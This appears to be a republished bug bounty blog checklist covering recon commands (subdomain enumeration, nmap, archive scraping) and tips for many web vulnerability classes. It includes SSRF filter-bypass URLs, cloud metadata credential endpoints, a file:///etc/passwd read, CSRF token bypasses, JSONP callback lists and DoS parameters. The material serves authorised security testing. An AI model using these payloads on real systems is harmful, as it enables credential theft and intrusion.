BUG BOUNTY CHECK LIST BY C1

rei_hunt
12 min readFeb 27, 2022

--

C1h2e1

Dec 21, 2019·11 min read

I just want to write a check list for myself. This article includes various vulnerability discovery method bypass methods. I hope you can read it carefully .

Twitter @C1h2e11

Wechat : baiheming123456

RECON

Most of my recon ideas come from nahamsec, he is really good

When I get a target, I first do a lot of information collection, such as Subdomain, IP, Port, File I get a target, I first do a lot of information collection, such as Subdomain, IP, Port, Endpoint

For subdomains, I will use crt.sh to find them. In the face of big goals, I will choose some interesting words, such as api, prod, dev, stage,backend, admin. Etc.

Subdomian

Let’s take yahoo as an example

crt.sh | %.yahoo.com

Free CT Log Certificate Search Tool from Sectigo (formerly Comodo CA)

crt.sh

crt.sh | %api%%.yahoo.com

Free CT Log Certificate Search Tool from Sectigo (formerly Comodo CA)

crt.sh

Use % to find the domain name you want . Here is a shell script to quickly collect some subdomains

curl https://www.threatcrowd.org/searchApi/v2/domain/report/\?domain=$1 |jq .subdomains |grep -o ‘\w.*$1’curl https://api.hackertarget.com/hostsearch/\?q\=$1 | grep -o '\w.*$1'
curl https://crt.sh/?q=%.$1 | grep "$1" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v " " | sort -ucurl https://certspotter.com/api/v0/certs?domain=$1 | grep -o '\[\".*\"\]'

Many times we will encounter domain can not be accessed at this time we can use httprobe to detect

tomnomnom/httprobe

Take a list of domains and probe for working http and https servers. ▶ go get -u github.com/tomnomnom/httprobe httprobe…

github.com

But certificate-based subdomains are incomplete and require some bruteforce I recommend using Sublist3r

aboul3la/Sublist3r

Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and…

github.com

We can also use Google Dork and Github I recommend the following script to search subdomains on github

gwen001/github-search

You can’t perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

github.com

Documents here

GitHub tools collection

This is the current thread in the bug hunter community: how to find sensitive informations on GitHub. Understand how to…

10degres.net

Here is the subdomain collection method I often use You can use platforms like shodan and zoomeye. I won’t go into details here.

IP

Censys.io ipinfo.io shodan.io

censys is a certificate-based query that can find many IP addresses I have found many bugs with it .We just need to query your target domain .You can click on the certificate on the right

Here you can see the subdomain name and we can use IPV4 to query. There will be an IPV4 address. If it is in Scope, we can test it. Note the get body of this mark. He takes the content in the response, so most of it is not yours Target asset

ipinfo and hostinfo.io can be used to query ASN codes and network segments .We can use shodan to combine with him

shodan also has many good features such as ssl-based search and favicon search can find a lot of target information . I won’t write much here

Dnsdumper Virustotal Can also find a lot of information

Port

Port scanning can use nmap and massscan

robertdavidgraham/masscan

This is an Internet-scale port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million…

github.com

Nmap: the Network Mapper — Free Security Scanner

Nmap 7.80 was released for DEFCON 27! [release notes | download] Nmap 7.70 is now available! [release notes | download]…

nmap.org

nmap -sV -T3 -Pn -p2075,2076,6443,3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443,19000,19080 ${target}

Endpoint

There are many ways about Endpoint

curl http://web.archive.org/cdx/search/cdx/search/cds?url=*.$1/*&output=text&fl=original&collapse=urlkey
curl http://index.commoncrawl.org/CC-MAIN-2018-22-index\?url\=\*.$1\&output\=json |jq .url

Commoncrawl and web archive can find many endpoints for us to test. At the same time, we can also use crawlers to get what we want. The main focus should be on JS files and API endpoints.

Threezh1/JSFinder

JSFinder is a tool for quickly extracting URLs and subdomains from JS files on a website.

github.com

I recommend a tool here.You can crawl useful Endpoints and we can also do BLH discovery. We will write related search methods later.

At the same time I will use dirsearch to brute force

maurosoria/dirsearch

Current Release: v0.3.9 (2019.11.26) dirsearch is a simple command line tool designed to brute force directories and…

github.com

C1h2e1/MyFuzzingDict

You can’t perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

github.com

My dictionary is here

HUNTING

I mainly hunt some BUG below

  • SSRF
  • CSRF(CORS,JSONP hijacking)
  • SQLi
  • XSS(DOM,Stored,Reflectd)
  • Weak Password
  • Unauthorized access
  • IDOR
  • Open redirect
  • Information Disclosure
  • XXE
  • File Upload
  • Subdomain Takeover
  • BLH
  • HTTP Requests Smuggling
  • CRLF
  • Auth Bypass
  • DOS
  • LFI
  • Command injection
  • Race Condition
  • S3 Bucket
  • Logic Flaw
  • SSTI

Let me introduce one by one and share Bypass tips

SSRF

https://medium.com/swlh/ssrf-in-the-wild-e2c598900434

This picture is a good summary of the common locations of SSRF .We can find related functions based on business.When you receive a request from the server.Try to access the intranet.If no response can be determined by time, same as Time-Based SQLi

BYPASS

tools

Open redirect/SSRF payload generator

Edit description

tools.intigriti.io

white@black.com ==> black[.]com 
black[.]com?white[.]com ==> black[.]com
black[.]com#white.com ==> black[.]com Tips By @____cypher____
http://127.0.0.1
http://localhost
https://127.0.0.1/
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0https://localhost/
http://[::]:80/
http://127.0.0.1.nip.io
http://[0:0:0:0:0:ffff:127.0.0.1]
http://spoofed.burpcollaborator.net
http://0177.0.0.1/
http://2130706433/
http://0/
https://10.0.0.1.xip.io
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib2 : 1.1.1.1
requests + browsers : 2.2.2.2
urllib : 3.3.3.3<?php
header("Location: http://127.0.0.1");
?>http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

Exploit

http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
File protocol to read local file
file:///etc/passwd
http://100.100.100.200/latest/meta-data/

swisskyrepo/PayloadsAllTheThings

Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on…

github.com

DNS Rebinding attack

My First SSRF Using DNS Rebinding

Imagine you are a computer :D People give you URLs and you load them Of course you won’t load url that points to your…

geleta.eu

cujanovic/SSRF-Testing

http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/…

github.com

CSRF(CORS,JSONP hijacking)

Ordinary CSRF we will not write here. Write some token bypass methods

Delete CSRF token
Null token parameter
Modify request method Form GET to POST or PUT etc.
Replace token with any string of the same length as token
Fixed token Every user's token can be shared

0ang3el

CORS Bypass

Think Outside the Scope: Advanced CORS Exploitation Techniques

Hi everyone,

medium.com

OUT OF SCOPE XSS and CORS

Use Safari’s URL feature to bypass

JSONP hijacking

kapytein/jsonp

jsonp is a Burp Extension which tries to discover JSONP functionality behind JSON endpoints. It does so by appending…

github.com

Burp suite Extension to discover JSONP func

FUZZ Callback Parameter

In another test, I found a JSONP hijacking at a.redacted.com. When I looked for a vulnerability in b.redacted.com, I found a JSON response, but there was no parameter in the requested URL. I tried the FUZZ parameter. But in the dictionary, Without _cb_ this parameter eventually I added _cb_ of a.redacted.com to b.redacted.com and successfully found JSONP hijacking

callback=gh0stkey
cb=gh0stkey
jsonp=gh0stkey
jsonpcallback=gh0stkey
jsonpcb=gh0stkey
jsonp_cb=gh0stkey
json=gh0stkey
jsoncallback=gh0stkey
jcb=gh0stkey
call=gh0stkey
cb_=gh0stkey
_cb_=gh0stkey

SQLi

SQL injection is always there. Actually all the key is to be careful.I found SQLi in my two most recent tests.Just need you to search all the parameters of each page carefully and add single quotes or %df or look for Time-Based SQLi

tennc/fuzzdb

You can’t perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

github.com

Check out this repo’s SQL i Payload

Tips : SQL INJECTION VIA HTTP HEADER!

I can’t think of anything to write here so SQL i is over.

XSS

We can use the endpoints obtained in the information collection to find reflected XSS,There are many positions for XSS. We should pay attention to Bypass’s payload.

XSS in hidden input fields

Gareth Heyes | 16 November 2015 at 11:25 UTC Updated: 14 June 2019 at 12:03 UTC At PortSwigger, we regularly run…

portswigger.net

XSS in Oculus Rifts CDN

After looking through Oculus Rifts site I came across the developer section for making apps. I quickly made a test app…

medium.com

I found a lot of Blind XSS in recent tests. I think that the location of the HTTP HEADER and some XSS and SQLi Payloads will have unexpected results.

I use XSS HUNTER for BlindXSS

XSS Hunter

Edit description

xsshunter.com

!!BlindXSSEveryWhere!!

C1h2e1/c1h2e1.github.io

Contribute to C1h2e1/c1h2e1.github.io development by creating an account on GitHub.

github.com

My Blog about XSS!

Weak Password

Try more

Unauthorized access

Most of the unauthorized access I usually find comes from brute force cracking of directories.Find more ports, more IPs, more services

IDOR

Quitten/Autorize

Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by…

github.com

Burp suite Extension to find IDOR

One Way to Find Hidden IDOR Vulnerability

I received an invitation for an internal project, i found an interesting vulnerability in this project. After…

gh0st.cn

The case of IDOR

There are many different test methods in the IDOR search process.We should pay attention to unique parameters and pages, and pay attention to the function of each API. I recommend using the Repeater of Burpsuite to mark the function and return content of the API. Email returns UID, we can use UID to find IDOR

Open redirect

When testing Open redirect, we can try to combine XSS to try to redirect javascript:alert (1)

I noticed this URL when I found 302, but I couldn’t redirect after opening it, so I tried Bypass.

Payload list

C1h2e1/c1h2e1.github.io

Contribute to C1h2e1/c1h2e1.github.io development by creating an account on GitHub.

github.com

Open Redirect Cheat Sheet

Hi, this is a cheat sheet for Open redirect vulnerabilities. It’s a first draft. I will update it every time I find a…

pentester.land

Replace whitelisted.com with your target

Information Disclosure

Github Pastebin Google etc.

Most of my information collection is found directly from recon

SO JUST RECON CAREFUL

Use github and pastebin to search for some sensitive information such as API key, token.

XXE

  1. Upload File

By uploading files in formats such as xls,doc

The process of making a malicious document

Exploiting XXE with Excel

XML External Entity attacks are very common, particularly through HTTP-based APIs, and we regularly encounter and…

www.4armed.com

2.OOB ATTACK

3.Modify Content-Type

U.S. Dept Of Defense disclosed on HackerOne: XXE in DoD website…

Summary:** XXE in https://█████ **Description:** A malicious user can modify an XML-based request to include XML…

hackerone.com

Starbucks disclosed on HackerOne: XXE at…

johnstone discovered that both ecjobs.starbucks.com.cn/retail/hxpublic_v6/hxdynamicpage6.aspx &…

hackerone.com

File Upload

Exploiting File Uploads Pt. 1 — MIME Sniffing to Stored XSS #bugbounty

While bug hunting on a private program I was able to find a Stored XSS vulnerability through a file upload…

anotherhackerblog.com

Exploiting File Uploads Pt. 2 — A Tale of a $3k worth RCE.

In this post I show how I was able to find a Remote Code Execution vulnerability on a private program through…

anotherhackerblog.com

We can test XSS and SSRF when uploading and ImageTragick RCE ,This idea is really hard for me to write.I will write the tips of Bypass

  • Add dot after the file name
  • File name with special symbol before or after
  • Delete meta-data
  • Race condition

modzero/mod0BurpUploadScanner

A Burp Suite Pro extension to do security tests for HTTP file uploads. Table of Contents Testing web applications is a…

github.com

I was writing this article after a day of school today. My mind is a bit messy XD

Subdomain Takeover

Echocipher/Subdomain-Takeover

一个子域名接管检测工具 author:Echocipher mail: echocipher@163.com blog: https://echocipher.github.io 本项目是我为…

github.com

haccer/subjack

Subjack is a Subdomain Takeover tool written in Go designed to scan a list of subdomains concurrently and identify ones…

github.com

Still no good tips, more subdomains have a higher chance of taking over

BLH

Command Injection Through BLH

Hi I am Shankar R ( @trapp3r_hat) from Tirunelveli (India). I hope you all doing good. I am a security researcher from…

medium.com

Broken Link Hijacking — How expired links can be exploited.

Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page. Broken Link Hijacking comes in…

edoverflow.com

tools

stevenvachon/broken-link-checker

Find broken links, missing images, etc within your HTML. ✅ Complete: Unicode, redirects, compression, basic auth…

github.com

HTTP Requests Smuggling

Write up of two HTTP Requests Smuggling

This article about how I found two sites for HTTP Request Smuugling

medium.com

CRLF

#BugBounty — Exploiting CRLF Injection can lands into a nice bounty

Hi Guys,

medium.com

Auth Bypass

Phabricator disclosed on HackerOne: Bypass auth.email-domains

Email addresses are stored as `VARCHAR(128)`. However, Phabricator does not verify the length of an email address upon…

hackerone.com

Oauth2 CSRF Modify the redirect_url to get the victim token .Can be bypassed using bypass open redirect

DOS

QIWI disclosed on HackerOne: apache access.log leakage via long…

Issue access.log is leaked by attacker who trying send many requests. #Explain: Honestly i don’t know how the bug is…

hackerone.com

imagesize size DOS

https://target.com/Verification/?high=100&weigh=100
https://target.com/Verification/?high=100000&weigh=1000000
response boom!
If there is no parameter to control the size, we can add it by ourselves
width=250&height=250
height=250
width=250
w=250&h=250
h=250
w=250
size=250&width=250&height=250
size=250&w=250&h=250
size=250
margin=250
margin=250&width=250&height=250
margin=250&w=250&h=250
size=250&margin=250
size=250&margin=250&width=250&height=250

Bypass some restrictions that affect the normal use of the user .Is what I think is the most meaningful DOS

[Writeup — FB] Crash web — app through application form of job application pages

It’s me again, after my first write-up bounty.

medium.com

I think using a lot of characters or very special characters may cause DOS

LFI

LFI Cheat Sheet

LFI stands for Local File Includes — it’s a file local inclusion vulnerability that allows an attacker to include files…

highon.coffee

Race Condition

HackerOne disclosed on HackerOne: Race Condition in Flag Submission

Summary:** This report describes a Race Condition Vulnerability which allow an authenticated user to submit the same…

hackerone.com

HackerOne disclosed on HackerOne: Race condition in performing…

Summary There exists a race condition in performing retests. By executing multiple requests to confirm a retest at the…

hackerone.com

HPP

Testing for HTTP Parameter pollution (OTG-INPVAL-004)

This article is part of the new OWASP Testing Guide v4. Back to the OWASP Testing Guide v4…

www.owasp.org

--

--

Responses (4)